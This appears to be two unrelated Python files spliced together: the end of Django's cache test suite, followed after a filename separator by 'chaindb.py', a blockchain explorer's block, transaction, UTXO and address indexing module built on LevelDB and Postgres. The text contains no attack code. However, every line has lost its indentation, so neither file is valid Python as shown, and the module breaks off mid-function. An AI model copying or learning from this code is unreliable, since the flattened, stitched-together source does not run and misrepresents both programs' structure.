('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = TemplateResponse(HttpResponse(), Template("This is a test"))
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = TemplateResponse(HttpResponse(), Template("This is a test"))
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = TemplateResponse(HttpResponse(), Template("This is a test"))
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestEtagWithAdmin(TestCase):
# See https://code.djangoproject.com/ticket/16003
urls = "admin_views.urls"
def test_admin(self):
with self.settings(USE_ETAGS=False):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertFalse(response.has_header('ETag'))
with self.settings(USE_ETAGS=True):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
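    # Note on the expected keys below: the trailing hash is an MD5 digest of
    # the vary_on values (md5(b'') == 'd41d8cd98f00b204e9800998ecf8427e',
    # md5(b'abc') == '900150983cd24fb0d6963f7d28e17f72').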
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertTrue(cache1 is cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertFalse(c[0] is c[1])
|
chaindb.py
|
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import gevent
import base64
import string
import struct
import os, sys
import bitcoin
import binascii
import io
import json
import threading
import socketio
from gevent.lock import BoundedSemaphore
from shared import settings
from datetime import datetime
from sync.cache import Cache
from shared.models import Block, Transaction, Address, AddressChanges, Utxo, Message, db, WalletGroup, WalletGroupAddress, WalletGroupAddressMerge
from bitcoin.messages import msg_block, MsgSerializable
from bitcoin.core import b2lx, lx, uint256_from_str, CBlock
from bitcoin.core.serialize import uint256_from_str, uint256_to_str, uint256_from_compact
from bitcoin.wallet import CBitcoinAddress
from bitcoin.core.script import CScript
from bitcointx.wallet import CBitcoinAddress as TX_CBitcoinAddress
from datetime import datetime, timedelta
if not os.path.exists('/data/explorer/blocks/'):
os.makedirs('/data/explorer/blocks/')
if not os.path.exists('/data/explorer/chainstate/'):
os.makedirs('/data/explorer/chainstate')
from wallet_group.group import WalletGrouper
# connect to the redis queue as an external process
external_sio = socketio.RedisManager('redis://%s' % settings.REDIS_HOST, write_only=True)
def int_to_bytes(i: int, *, signed: bool = False) -> bytes:
length = (i.bit_length() + 7 + int(signed)) // 8
return i.to_bytes(length, byteorder='big', signed=signed)
def bytes_to_int(b: bytes, *, signed: bool = False) -> int:
return int.from_bytes(b, byteorder='big', signed=signed)
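# Example round trip (illustrative): int_to_bytes(255) == b'\xff',
# bytes_to_int(b'\x01\x00') == 256, and bytes_to_int(int_to_bytes(n)) == n
# for any non-negative n.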
def ser_uint256(i):
return uint256_to_str(i)
class TxIdx(object):
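    """Transaction index entry: the hash of the block containing the tx plus a
    bitmask of which of its outputs have been spent."""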
def __init__(self, blkhash, spentmask=0):
self.blkhash = blkhash
self.spentmask = spentmask
class BlkMeta(object):
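    """Per-block metadata (chain height and cumulative work), serialized as
    b'<height> <hex(work)>'."""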
def __init__(self):
self.height = -1
self.work = 0
def deserialize(self, s):
s = s.decode('utf-8')
l = s.split()
if len(l) < 2:
raise RuntimeError
self.height = int(l[0])
self.work = int(l[1], 16)
def serialize(self):
r = str(self.height) + ' ' + hex(self.work)
return r.encode()
def __repr__(self):
return "BlkMeta(height %d, work %x)" % (self.height, self.work)
class HeightIdx(object):
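    """Block hashes seen at a given height, serialized as a space-separated
    list of little-endian hex hashes."""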
def __init__(self):
self.blocks = []
def deserialize(self, s):
s = s.decode('utf-8')
self.blocks = []
l = s.split()
for hashstr in l:
hash = lx(hashstr)
self.blocks.append(hash)
def serialize(self):
l = []
for blkhash in self.blocks:
l.append(b2lx(blkhash))
return (' '.join(l)).encode()
def __repr__(self):
return "HeightIdx(blocks=%s)" % (self.serialize(),)
class ChainDb(object):
def __init__(self, log, mempool, params):
self.log = log
self.mempool = mempool
self.params = params
self.utxo_changes = 0
self.cache = Cache()
self.cache.clear()
        ## LevelDB key layout:
        # pg_block:* block data queued for insert into the PG database
        # pg_tx:*    transaction data queued for insert into the PG database
        # tx:*       transaction index (block hash + spent-output bitmask)
        # misc:*     chain state (height, tophash, total_work, msg_start)
        # height:*   list of block hashes at height h
        # blkmeta:*  block metadata (height, cumulative work)
        # blocks:*   block seek position in the blocks.dat stream
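        #
        # Illustrative values (not taken from a real chain):
        #   b'misc:height'          -> struct.pack('i', 1234)
        #   b'blkmeta:<hex hash>'   -> b'1234 0x29d...'    (BlkMeta.serialize(): height + hex(work))
        #   b'height:1234'          -> b'<hash1> <hash2>'  (HeightIdx.serialize(): space-joined hashes)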
datadir = '/data/explorer/blocks/'
self.db = self.cache.db
self.blk_write = io.BufferedWriter(io.FileIO(datadir + '/blocks.dat','ab'))
self.blk_read = io.BufferedReader(io.FileIO(datadir + '/blocks.dat','rb'))
if self.db.get(b'misc:height') is None:
self.log.info('INITIALIZING EMPTY BLOCKCHAIN DATABASE')
with self.db.write_batch(transaction=True) as batch:
batch.put(b'misc:height', struct.pack('i', -1))
batch.put(b'misc:msg_start', self.params.NETMAGIC)
batch.put(b'misc:tophash', ser_uint256(0))
batch.put(b'misc:total_work', b'0x0')
start = self.db.get(b'misc:msg_start')
if start != self.params.NETMAGIC:
self.log.error("Database magic number mismatch. Data corruption or incorrect network?")
raise RuntimeError
self.block_lock = BoundedSemaphore()
self.address_changes = {}
self.address_change_count = 0
self.transaction_change_count = 0
self.utxo_cache = {}
self.tx_lock = False
self.initial_sync = True
self.wallet_group = WalletGrouper('/data/explorer/wallets')
self.checktransactions(True)
self.checkaddresses(True)
self.checkblocks(0, True)
self.checkutxos(True)
self.orphans = {}
self.orphan_deps = {}
if Block.select().count(None) == 0:
self.log.info('Initialising genesis block')
self.putblock(self.params.GENESIS_BLOCK)
def locate(self, locator):
return 0
def gettophash(self):
return self.db.get(b'misc:tophash')
def getlocator(self):
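        """Build a simple block locator: the current top hash plus the block
        hashes recorded 25 blocks below the tip (when the chain is that long)."""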
vHave = [self.gettophash()]
height = struct.unpack('i', self.db.get(b'misc:height'))[0]
if height > 25:
data = self.db.get(('height:%s' % (height - 25)).encode())
heightidx = HeightIdx()
heightidx.deserialize(data)
vHave = vHave + heightidx.blocks
return vHave
# def haveblock(self, sha256, _):
# return False
def getheight(self):
d = self.db.get(b'misc:height')
return struct.unpack('i', d)[0]
def pututxo(self, txid, vout, address, value, wb=None, scriptPubKey=None, blockHeight=None):
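        """Cache an unspent output as b'<txid>:<vout>' -> b'<address>:<value>' and,
        when a write batch is given, queue a pg_utxo_put record for Postgres."""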
key = ('%s:%s' % (txid, vout)).encode()
data = ('%s:%s' % (address, value)).encode()
self.utxo_cache[key] = data
self.utxo_changes += 1
if wb:
wb.put(('pg_utxo_put:%s:%s' % (txid, vout)).encode(), ('%s:%s:%s:%s' % (address, value, scriptPubKey, blockHeight)).encode())
def getutxo(self, txid, vout):
key = ('%s:%s' % (txid, vout)).encode()
if key in self.utxo_cache:
r = self.utxo_cache[key]
else:
r = self.db.get(key)
r = r.decode("utf-8").split(':')
return (r[0], int(r[1]))
def poputxo(self, wb, txid, vout):
key = ('%s:%s' % (txid, vout)).encode()
if key in self.utxo_cache:
r = self.utxo_cache[key]
del self.utxo_cache[key]
else:
r = self.db.get(key)
wb.delete(key)
r = r.decode("utf-8").split(':')
wb.put(('pg_utxo_del:%s:%s' % (txid, vout)).encode(), b'')
self.utxo_changes += 1
return (r[0], int(r[1]))
def _committransactions(self):
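        """Drain queued pg_tx:* records from LevelDB into the Transaction table
        in chunks of at most 20000, emitting per-address socket.io events once
        the initial sync has finished."""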
if self.tx_lock:
return
self.tx_lock = True
count = 0
loop = False
first = True
try:
while loop or first:
first = False
                self.log.debug('Committing transaction updates')
with self.db.write_batch(transaction=True) as deleteBatch:
transactions = []
with self.db.snapshot() as sn:
for key, value in sn.iterator(prefix=b'pg_tx:'):
txid = key.decode('utf-8').split(':')[1]
count += 1
data = json.loads(value.decode('utf-8'))
transactions.append({
"txid": txid,
"vin": data["vin"],
"vout": data["vout"],
"input_value": data["input_value"],
"output_value": data["output_value"],
"block": data["block"],
"block_height": data["block_height"],
"addresses_out": data["addresses_out"],
"addresses_in": data["addresses_in"],
"timestamp": datetime.fromtimestamp(data["timestamp"]),
})
deleteBatch.delete(key)
if count > 20000:
count = 0
loop = True
break
if len(transactions) > 0:
if not self.initial_sync:
for tx in transactions:
for addr, value in tx['addresses_out'].items():
external_sio.emit(addr, tx, room=addr)
for addr, value in tx['addresses_in'].items():
external_sio.emit(addr, tx, room=addr)
Transaction.insert_many(transactions).execute(None)
self.transaction_change_count -= count
finally:
self.tx_lock = False
self.log.debug('Transaction update complete')
def checktransactions(self, force=False):
if not force and (self.tx_lock or self.transaction_change_count < 500):
return
t = threading.Thread(target=self._committransactions)
t.daemon = True
t.start()
def checkaddresses(self, force=False):
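        """Flush accumulated address:* balance deltas into the AddressChanges
        table and fold them into the address table via a single upsert."""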
if force or self.address_change_count > 10000:
            self.log.debug('Committing address balance updates')
sys.stdout.flush()
changes_list = []
self.address_change_count = 0
with self.db.write_batch(transaction=True) as deleteBatch:
for key, value in self.db.iterator(prefix=b'address:'):
balance, sent, received = struct.unpack('lll', value)
address = key.decode('utf-8').split(':')[1]
changes_list.append({'address': address, 'balance_change': balance, 'sent_change': sent, 'received_change': received})
deleteBatch.delete(key)
if len(changes_list) > 0:
AddressChanges.insert_many(changes_list).execute(None)
db.execute_sql("""
INSERT INTO address (address, balance, sent, received)
(SELECT address, sum(balance_change) as balance_change, sum(sent_change) as sent_change, sum(received_change) as received_change
FROM addresschanges GROUP BY address)
ON CONFLICT(address) DO
UPDATE SET balance = address.balance + EXCLUDED.balance, sent = address.sent + EXCLUDED.sent, received = address.received + EXCLUDED.received;
TRUNCATE addresschanges;
""")
def checkblocks(self, height, force=False):
if force or height % 300 == 0:
self.log.debug('Commit blocks')
blocks = []
hashes = []
with self.db.write_batch(transaction=True) as deleteBatch:
for key, value in self.db.iterator(prefix=b'pg_block:'):
data = json.loads(value.decode('utf-8'))
hashes.append(data['hash'])
data['version'] = struct.pack('>i', data['version'])
data['bits'] = struct.pack('>i', data['bits'])
data['coinbase'] = base64.decodebytes(data['coinbase'].encode())
data['timestamp'] = datetime.fromtimestamp(data['timestamp'])
data['chainwork'] = int_to_bytes(data['chainwork'])
blocks.append(data)
deleteBatch.delete(key)
if blocks:
if not self.initial_sync:
for block in blocks:
b = Block.create(**block)
external_sio.emit('block', b.to_json(), room='inv')
else:
Block.insert_many(blocks).execute(None)
with self.db.write_batch(transaction=True) as deleteBatch:
with self.db.snapshot() as sn:
wallets = []
walletsAddress = []
for key, value in sn.iterator(prefix=b'walletCreate:'):
addr = key.decode().split(':')[1]
uid = value.decode()
wallets.append({
'uid': uid
})
walletsAddress.append({
'wallet': uid,
'address': addr,
})
deleteBatch.delete(key)
self.log.info('PG wallet create %s for %s' % (uid, addr))
if wallets:
WalletGroup.insert_many(wallets).on_conflict_ignore().execute(None)
for key, value in sn.iterator(prefix=b'walletAdd:'):
addr = key.decode().split(':')[1]
walletsAddress.append({
'wallet': value.decode(),
'address': addr,
})
self.log.info('PG wallet add %s for %s' % (value.decode(), addr))
deleteBatch.delete(key)
if walletsAddress:
WalletGroupAddress.insert_many(walletsAddress).execute(None)
for key, value in sn.iterator(prefix=b'walletMerge:'):
existingWalletId = key.decode().split(':')[1]
newWalletId = value.decode()
deleteBatch.delete(key)
res = WalletGroupAddress.update(wallet = newWalletId).where(WalletGroupAddress.wallet == existingWalletId).execute(None)
self.log.info('PG wallet merge from %s to %s (%s)' % (existingWalletId, newWalletId, res))
# if walletsMerge:
# WalletGroupAddressMerge.insert_many(walletsMerge).execute(None)
# db.execute_sql("INSERT INTO walletgroupaddress (wallet, address) (SELECT wallet, address FROM walletgroupaddressmerge) ON CONFLICT (address) DO UPDATE SET wallet = EXCLUDED.wallet; TRUNCATE walletgroupaddressmerge")
def checkutxos(self, force=False):
if force or self.utxo_changes > 10000:
self.log.debug('Commit utxo changes')
utxos = []
#wb.put(('pg_utxo_put:%s:%s' % (txid, vout)).encode(), ('%s:%s:%s:%s' % (address, value, scriptPubKey, blockHeight)).encode())
with self.db.write_batch(transaction=True) as deleteBatch:
for key, value in self.db.iterator(prefix=b'pg_utxo_put:'):
key_parts = key.decode().split(':')
txid = key_parts[1]
vout = key_parts[2]
                    (address, value, scriptPubKey, blockHeight) = value.decode().split(':')
utxos.append({
'txid': txid,
'vout': vout,
'address': address,
'scriptPubKey': scriptPubKey,
'block_height': blockHeight,
'amount': value
})
deleteBatch.delete(key)
if utxos:
Utxo.insert_many(utxos).execute(None)
utxos = []
with self.db.write_batch(transaction=True) as deleteBatch:
for key, value in self.db.iterator(prefix=b'pg_utxo_del:'):
key_parts = key.decode().split(':')
txid = key_parts[1]
vout = key_parts[2]
utxos.append('(\'%s\', %s)' % (txid, vout))
if utxos:
# print('Deleting utxos')
# print(utxos)
# select * from utxo join (VALUES('TE8evzF3gZoRQozJgfNzekrv7uiBgKKFiE', '001239f17dde519a4fbadb71dda3725ef7474ab2995b6466e8c079dc5c2a7865:0')) AS t(addr, t) ON addr = address and txid_vout = t;
q = 'DELETE FROM utxo WHERE id in (SELECT id FROM utxo JOIN (VALUES %s) AS t (t, v) ON t = txid AND v = vout)' % ','.join(utxos)
#Utxo.delete().where(Utxo.txid_vout.in_(utxos)).execute()
Utxo.raw(q).execute(None)
self.utxo_changes = 0
def mempool_add(self, tx):
# Do not add if not fully synced
if self.initial_sync:
return
# TODO: Transaction can get stuck in mempool if double-spent or RBF
# TODO: Add expiry from mempool? e.g. x blocks, either indicates not accepted by the network or stuck in mempool due to another issue
self.mempool.add(tx)
timestamp = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
tx_parsed = self.parse_tx(timestamp, None, None, tx)
Transaction.insert_many([tx_parsed]).execute(None)
for vin in tx.vin:
Utxo.update(spent=True).where((Utxo.txid == b2lx(vin.prevout.hash)) & (Utxo.vout == vin.prevout.n)).execute()
external_sio.emit('tx', tx_parsed, room='inv')
def mempool_remove(self, txid):
self.mempool.remove(txid)
Transaction.delete().where(Transaction.txid == txid).execute()
def parse_vin(self, tx, txid, tx_data, vin, idx, batch=None):
if tx.is_coinbase() and idx == 0:
tx_data["vin"] = [{"coinbase": b2lx(tx.vin[0].scriptSig[::-1])}]
tx_data["addresses_in"][None] = 0
return
if batch:
# TODO: remove old utxo db
preaddress, prevalue = self.poputxo(batch, b2lx(vin.prevout.hash), vin.prevout.n)
self.spend_txout(b2lx(vin.prevout.hash), vin.prevout.n, batch)
else:
preaddress, prevalue = self.getutxo(b2lx(vin.prevout.hash), vin.prevout.n)
tx_data["vin"].append({"txid": b2lx(vin.prevout.hash), "vout": vin.prevout.n, "value": prevalue})
tx_data["input_value"] += prevalue
# Add to the value of address vin
if preaddress in tx_data["addresses_in"]:
tx_data["addresses_in"][preaddress] += prevalue
else:
tx_data["addresses_in"][preaddress] = prevalue
# Update address tracking only when non-mempool (batch is not none)
if batch:
self.log.debug("Updating address %s with value %s" % (preaddress, -prevalue))
if preaddress in self.address_changes:
self.address_changes[preaddress]['balance'] -= prevalue
self.address_changes[preaddress]['sent'] += prevalue
else:
self.address_changes[preaddress] = {
'balance': -prevalue,
'sent': prevalue,
'received': 0,
}
def parse_vout(self, tx, txid, tx_data, vout, idx, batch=None, blockHeight=None):
script = vout.scriptPubKey
if len(script) >= 38 and script[:6] == bitcoin.core.WITNESS_COINBASE_SCRIPTPUBKEY_MAGIC:
return
try:
script = CScript(vout.scriptPubKey)
if script.is_unspendable():
self.log.warn("Unspendable %s" % vout.scriptPubKey)
if vout.scriptPubKey[2:4] == b'\xfe\xab':
m = vout.scriptPubKey[4:].decode('utf-8')
Message.create(message=m)
return
address = str(TX_CBitcoinAddress.from_scriptPubKey(script))
except:
self.log.warn('scriptPubKey invalid txid=%s scriptPubKey=%s value=%s' % (txid, b2lx(vout.scriptPubKey), vout.nValue))
return
value = vout.nValue
self.pututxo(txid, idx, address, value, wb=batch, scriptPubKey=vout.scriptPubKey.hex(), blockHeight=blockHeight)
tx_data["vout"].append({"address": address, "value": value, "vout": idx})
if address in tx_data["addresses_out"]:
tx_data["addresses_out"][address] += value
else:
tx_data["addresses_out"][address] = value
tx_data["output_value"] += value
# Update address tracking only when non-mempool (batch is not none)
if batch:
self.log.debug("Updating address %s with value %s" % (address, value))
if address in self.address_changes:
self.address_changes[address]['balance'] += value
self.address_changes[address]['received'] += value
else:
self.address_changes[address] = {
'balance': value,
'received': value,
'sent': 0,
}
def parse_tx(self, timestamp, bHash, bHeight, tx, batch=None):
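        """Build the flattened transaction record (inputs, outputs, per-address
        totals) used for Postgres and socket.io; when a batch is given, the
        record is queued under pg_tx:<txid> and the input addresses are fed to
        the wallet grouper."""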
txid = b2lx(tx.GetTxid())
tx_data = {
"txid": txid,
"vout": [],
"vin": [],
"input_value": 0,
"output_value": 0,
"block": bHash,
"block_height": bHeight,
"addresses_in": {},
"addresses_out": {},
"timestamp": timestamp
}
for idx, vin in enumerate(tx.vin):
self.parse_vin(tx, txid, tx_data, vin, idx, batch)
for idx, vout in enumerate(tx.vout):
self.parse_vout(tx, txid, tx_data, vout, idx, batch, blockHeight=bHeight)
if batch:
batch.put(('pg_tx:%s' % txid).encode(), json.dumps(tx_data).encode())
self.transaction_change_count += 1
# connect inputs to wallet group tree
addrs = list(map(lambda x: x[0], tx_data['addresses_in'].items()))
self.wallet_group.connect_input(batch, addrs)
return tx_data
def parse_vtx(self, vtx, wb, timestamp, bHash, bHeight):
neverseen = 0
for tx in vtx:
txid = b2lx(tx.GetTxid())
if not self.mempool_remove(txid):
neverseen += 1
txidx = TxIdx(b2lx(bHash))
if not self.puttxidx(txid, txidx, batch=wb):
self.log.warn("TxIndex failed %s" % (txid,))
return False
tx_parsed = self.parse_tx(timestamp, b2lx(bHash), bHeight, tx, wb)
# Emit coinbase transactions
if not self.initial_sync and tx.is_coinbase():
external_sio.emit('tx', tx_parsed, room='inv')
def clear_txout(self, txhash, n_idx, batch=None):
txidx = self.gettxidx(txhash)
if txidx is None:
return False
txidx.spentmask &= ~(1 << n_idx)
self.puttxidx(txhash, txidx, batch)
return True
def unique_outputs(self, block):
outputs = {}
txmap = {}
for tx in block.vtx:
            if tx.is_coinbase():
continue
txmap[tx.GetTxid()] = tx
for txin in tx.vin:
v = (txin.prevout.hash, txin.prevout.n)
if v in outputs:
return None
outputs[v] = False
return (outputs, txmap)
def db_sync(self):
self.checktransactions(force=True)
self.checkaddresses(force=True)
self.checkblocks(0, force=True)
self.checkutxos(force=True)
gevent.spawn_later(5, self.db_sync)
def haveblock(self, blkhash, checkorphans):
#TODO: add block cache
# if self.blk_cache.exists(blkhash):
# return True
if checkorphans and blkhash in self.orphans:
return True
ser_hash = b2lx(blkhash)
block = self.db.get(('blocks:'+ser_hash).encode())
return block is not None
def have_prevblock(self, block):
if self.getheight() < 0 and b2lx(block.GetHash()) == b2lx(self.params.GENESIS_BLOCK.GetHash()):
return True
if self.haveblock(block.hashPrevBlock, False):
return True
return False
def putoneblock(self, block, initsync=True):
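        """Append the block to blocks.dat, index its file offset and metadata in
        LevelDB, and extend (or reorganize to) the best chain when it carries
        more cumulative work than the current tip."""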
if not self.have_prevblock(block):
self.orphans[block.GetHash()] = True
self.orphan_deps[block.hashPrevBlock] = block
self.log.warn("Orphan block %s (%d orphans)" % (b2lx(block.GetHash()), len(self.orphan_deps)))
return False
# if block.hashPrevBlock != self.gettophash():
# print("Cannot connect block to chain %s %s" % (b2lx(block.GetHash()), b2lx(self.gettophash())))
# return
top_height = self.getheight()
top_work = bytes_to_int(self.db.get(b'misc:total_work'))
prevmeta = BlkMeta()
if top_height >= 0:
ser_prevhash = b2lx(block.hashPrevBlock)
data = self.db.get(('blkmeta:'+ser_prevhash).encode())
prevmeta.deserialize(data)
else:
ser_prevhash = ''
# build network "block" msg, as canonical disk storage form
msg = msg_block()
msg.block = block
msg_data = msg.to_bytes()
# write "block" msg to storage
fpos = self.blk_write.tell()
self.blk_write.write(msg_data)
self.blk_write.flush()
with self.db.write_batch(transaction=True) as batch:
# add index entry
ser_hash = b2lx(block.GetHash())
key = ('blocks:'+ser_hash).encode()
value = struct.pack('i', fpos)
batch.put(key, value)
# store metadata related to this block
blkmeta = BlkMeta()
blkmeta.height = prevmeta.height + 1
blkmeta.work = (prevmeta.work + uint256_from_compact(block.nBits))
batch.put(('blkmeta:'+ser_hash).encode(), blkmeta.serialize())
# store list of blocks at this height
heightidx = HeightIdx()
heightstr = str(blkmeta.height)
d = self.db.get(('height:'+heightstr).encode())
if d:
heightidx.deserialize(d)
heightidx.blocks.append(block.GetHash())
batch.put(('height:'+heightstr).encode(), heightidx.serialize())
# print('height: %s' % blkmeta.height)
# print('blk: %s' % blkmeta.work)
# print('top: %s' % top_work)
# if chain is not best chain, proceed no further
if (blkmeta.work <= top_work):
self.log.info("ChainDb: height %d (weak), block %s" % (blkmeta.height, b2lx(block.GetHash())))
return True
# update global chain pointers
if not self.set_best_chain(ser_prevhash, ser_hash, block, blkmeta):
return False
return True
def set_best_chain(self, ser_prevhash, ser_hash, block, blkmeta):
# the easy case, extending current best chain
if (blkmeta.height == 0 or b2lx(self.db.get(b'misc:tophash')) == ser_prevhash):
c = self.connect_block(ser_hash, block, blkmeta)
#TODO: test
# if blkmeta.height > 0:
            #     self.disconnect_block(block)
return c
# switching from current chain to another, stronger chain
return self.reorganize(block.GetHash())
def getblockmeta(self, blkhash):
ser_hash = b2lx(blkhash)
try:
meta = BlkMeta()
meta.deserialize(self.db.get(('blkmeta:'+ser_hash).encode()))
except KeyError:
return None
return meta
def getblockheight(self, blkhash):
meta = self.getblockmeta(blkhash)
if meta is None:
return -1
return meta.height
def reorganize(self, new_best_blkhash):
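        """Walk both chains back to their fork point, disconnect the blocks on
        the old best chain, then connect the blocks of the new, heavier chain."""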
self.log.warn("REORGANIZE")
conn = []
disconn = []
old_best_blkhash = self.gettophash()
fork = old_best_blkhash
longer = new_best_blkhash
while fork != longer:
while (self.getblockheight(longer) > self.getblockheight(fork)):
block = self.getblock(longer)
conn.append(block)
longer = block.hashPrevBlock
if longer == 0:
return False
if fork == longer:
break
block = self.getblock(fork)
disconn.append(block)
fork = block.hashPrevBlock
if fork == 0:
return False
self.log.warn("REORG disconnecting top hash %s" % (b2lx(old_best_blkhash),))
self.log.warn("REORG connecting new top hash %s" % (b2lx(new_best_blkhash),))
self.log.warn("REORG chain union point %s" % (b2lx(fork),))
self.log.warn("REORG disconnecting %d blocks, connecting %d blocks" % (len(disconn), len(conn)))
conn.reverse()
for block in disconn:
if not self.disconnect_block(block):
return False
for block in conn:
if not self.connect_block(b2lx(block.GetHash()), block, self.getblockmeta(block.GetHash())):
return False
self.log.warn("REORGANIZE DONE")
return True
def _address_from_vout(self, txid, vout):
script = vout.scriptPubKey
if len(script) >= 38 and script[:6] == bitcoin.core.WITNESS_COINBASE_SCRIPTPUBKEY_MAGIC:
return
try:
script = CScript(vout.scriptPubKey)
if script.is_unspendable():
self.log.warn("Unspendable %s" % vout.scriptPubKey)
if vout.scriptPubKey[2:4] == b'\xfe\xab':
m = vout.scriptPubKey[4:].decode('utf-8')
Message.create(message=m)
return
return str(TX_CBitcoinAddress.from_scriptPubKey(script))
except:
self.log.warn('scriptPubKey invalid txid=%s scriptPubKey=%s value=%s' % (txid, b2lx(vout.scriptPubKey), vout.nValue))
def disconnect_block(self, block):
ser_prevhash = b2lx(block.hashPrevBlock)
prevmeta = BlkMeta()
prevmeta.deserialize(self.db.get(('blkmeta:'+ser_prevhash).encode()))
tup = self.unique_outputs(block)
if tup is None:
return False
outputs = tup[0]
# mark deps as unspent
with self.db.write_batch(transaction=True) as batch:
for output in outputs:
self.clear_txout(output[0], output[1], batch)
# update tx index and memory pool
for tx in block.vtx:
ser_hash = b2lx(tx.GetTxid())
batch.delete(('tx:'+ser_hash).encode())
if not tx.is_coinbase():
self.mempool_add(tx)
# update database pointers for best chain
batch.put(b'misc:total_work', int_to_bytes(prevmeta.work))
batch.put(b'misc:height', struct.pack('i', prevmeta.height))
batch.put(b'misc:tophash', lx(ser_prevhash))
# TODO:
# [x] Search block cache for block and marked as orphaned
# [x] Search transaction cache and delete
#
# [x] Mark block as orphaned
# [x] Remove transactions from transaction table, mempool add done above
# [x] Revert balance changes
#
# Disconnects happen infrequently so we can do these updates to postgres DB immediately
bhash = b2lx(block.GetHash())
key = ('pg_block:%s' % bhash).encode()
cached_block = self.db.get(key)
if cached_block:
cached_block = json.loads(cached_block.decode('utf-8'))
cached_block['orphaned'] = True
batch.put(key, (json.dumps(cached_block)).encode())
for tx in block.vtx:
if tx.is_coinbase():
continue
ser_hash = b2lx(tx.GetTxid())
                key = ('pg_tx:%s' % ser_hash).encode()
batch.delete(key)
Block.update(orphaned=True).where(Block.hash == b2lx(block.GetHash())).execute()
Transaction.delete().where(Transaction.block == b2lx(block.GetHash())).execute()
for tx in block.vtx:
txid = b2lx(tx.GetTxid())
for idx, vin in enumerate(tx.vin):
if tx.is_coinbase() and idx == 0:
continue
preaddress, prevalue = self.getutxo(b2lx(vin.prevout.hash), vin.prevout.n)
if preaddress in self.address_changes:
self.address_changes[preaddress]['balance'] += prevalue
self.address_changes[preaddress]['sent'] -= prevalue
else:
self.address_changes[preaddress] = {
'balance': prevalue,
'sent': -prevalue, # subtract from sent
'received': 0,
}
for idx, vout in enumerate(tx.vout):
address = self._address_from_vout(txid, vout)
value = vout.nValue
if address in self.address_changes:
self.address_changes[address]['balance'] -= value
self.address_changes[address]['received'] -= value
else:
self.address_changes[address] = {
'balance': -value,
'received': -value,
'sent': 0
}
self._update_address_index()
self.checkaddresses(force=True)
self.log.info("ChainDb(disconn): height %d, block %s" % (prevmeta.height, b2lx(block.hashPrevBlock)))
return True
def _update_address_index(self):
with self.db.write_batch(transaction=True) as addressBatch:
